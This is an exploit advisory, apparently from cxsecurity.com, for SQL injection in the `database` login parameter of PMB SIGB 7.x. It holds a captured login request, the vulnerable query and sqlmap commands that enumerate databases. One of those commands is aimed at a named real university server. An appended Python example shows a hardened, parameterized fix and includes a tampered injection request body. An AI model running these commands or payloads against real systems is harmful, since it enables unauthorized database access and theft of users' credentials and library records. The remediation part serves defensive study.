PMB SIGB 7.x - SQL Injection
PMB SIGB 7.x has a SQL injection vulnerability: an attacker can execute malicious queries through the `database` parameter at the login endpoint. The vulnerability can lead to database enumeration, data exfiltration and authentication bypass. Upgrading to PMB 8.0.1.2 or later is recommended to fix the issue.

2025-12-27 21:41:56 Author: cxsecurity.com


Exploit Title: PMB SIGB 7.x - SQL Injection
Date: 12-26-2025
Location: Algeria 23000
Exploit Author: DZ Mind Injector
Vendor Homepage: https://www.sigb.net
Software Link: https://forge.sigb.net/projects/pmb
Version: <= 7.5.8
Tested on: PMB 7.x
CVE: N/A
Category: webapps

Vulnerability Summary

PMB SIGB main.php login endpoint is vulnerable to SQL Injection in the database parameter. The application fails to sanitize user-supplied input before including it in a database query during authentication.

Vulnerable Request (Captured via Burp Suite)

```text
POST /main.php HTTP/2
Host: target.com
Content-Length: 51
Cache-Control: max-age=0
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: target.com
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: target.com
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

ret_url=&database=ehec_db&user=admin&password=admin
```

Response (302 Success - No login_error=1):

```text
HTTP/2 302 Found
Location: index.php
```

Exploit Command

```text
sqlmap -u "https://target.com/main.php" --data="ret_url=&database=ehec_db&user=admin&password=admin" -p database --batch --dbs --risk=3 --level=5
```

POC (Real Algerian University Target)

```text
sqlmap -u "https://pmb.univ-guelma.dz/main.php" --data="ret_url=&database=ehec_db&user=admin&password=admin" -p database --batch --dbs --risk=3 --level=5
```

Technical Details

The database parameter is directly concatenated into the SQL query without sanitization:

```sql
SELECT * FROM users WHERE database='$database' AND user='$user' AND password='$password'
```

Impact

- Database enumeration (--dbs)
- Table/column extraction
- Data exfiltration (users, passwords, library records)
- Potential authentication bypass
- Combined with default admin:admin = full admin access

Remediation

Upgrade to PMB >= 8.0.1.2
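
For anyone reviewing similar login code, the concatenated query from Technical Details is shown below next to a hardened form that allow-lists the `database` selector and binds every value. This is an added example, not code from PMB or from the advisory's author. It uses Python's `sqlite3` as a stand-in for the real PHP/MySQL stack, and the table contents, the `ALLOWED_DATABASES` set, the function names and both request bodies are constructed assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

# Assumption: the database names this deployment actually serves.
ALLOWED_DATABASES = {"ehec_db"}

# Constructed request bodies in the shape of the captured login POST.
BENIGN = "ret_url=&database=ehec_db&user=librarian&password=S3cret-constructed"
TAMPERED = "ret_url=&database=ehec_db%27+OR+%271%27%3D%271%27+--+&user=x&password=x"

def make_db():
    """In-memory stand-in for the users table named in the advisory's query."""
    con = sqlite3.connect(":memory:")
    con.execute('CREATE TABLE users ("database" TEXT, "user" TEXT, "password" TEXT)')
    con.execute("INSERT INTO users VALUES ('ehec_db', 'librarian', 'S3cret-constructed')")
    return con

def parse_form(body):
    """Decode an application/x-www-form-urlencoded login body."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: fields.get(k, [""])[0] for k in ("database", "user", "password")}

def login_concatenated(con, form):
    """Pattern from Technical Details: values pasted into the SQL text."""
    sql = ("SELECT * FROM users WHERE \"database\"='%(database)s' "
           "AND \"user\"='%(user)s' AND \"password\"='%(password)s'" % form)
    return con.execute(sql).fetchall()

def login_hardened(con, form):
    """Allow-list the database selector, then bind every value as a parameter."""
    if form["database"] not in ALLOWED_DATABASES:
        return []  # rejected before any SQL is built
    sql = 'SELECT * FROM users WHERE "database"=? AND "user"=? AND "password"=?'
    return con.execute(sql, (form["database"], form["user"], form["password"])).fetchall()

def compare(body):
    """Row counts returned by each variant for one request body."""
    con, form = make_db(), parse_form(body)
    return len(login_concatenated(con, form)), len(login_hardened(con, form))

if __name__ == "__main__":
    print("benign  :", compare(BENIGN))    # both variants match the one real account
    print("tampered:", compare(TAMPERED))  # only the concatenated query matches
```

The allow-list covers only the `database` selector. Bound parameters are what keep the `user` and `password` values from being parsed as SQL, including legitimate values that happen to contain an apostrophe.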



 


Copyright 2025, cxsecurity.com

Source: https://cxsecurity.com/issue/WLB-2025120030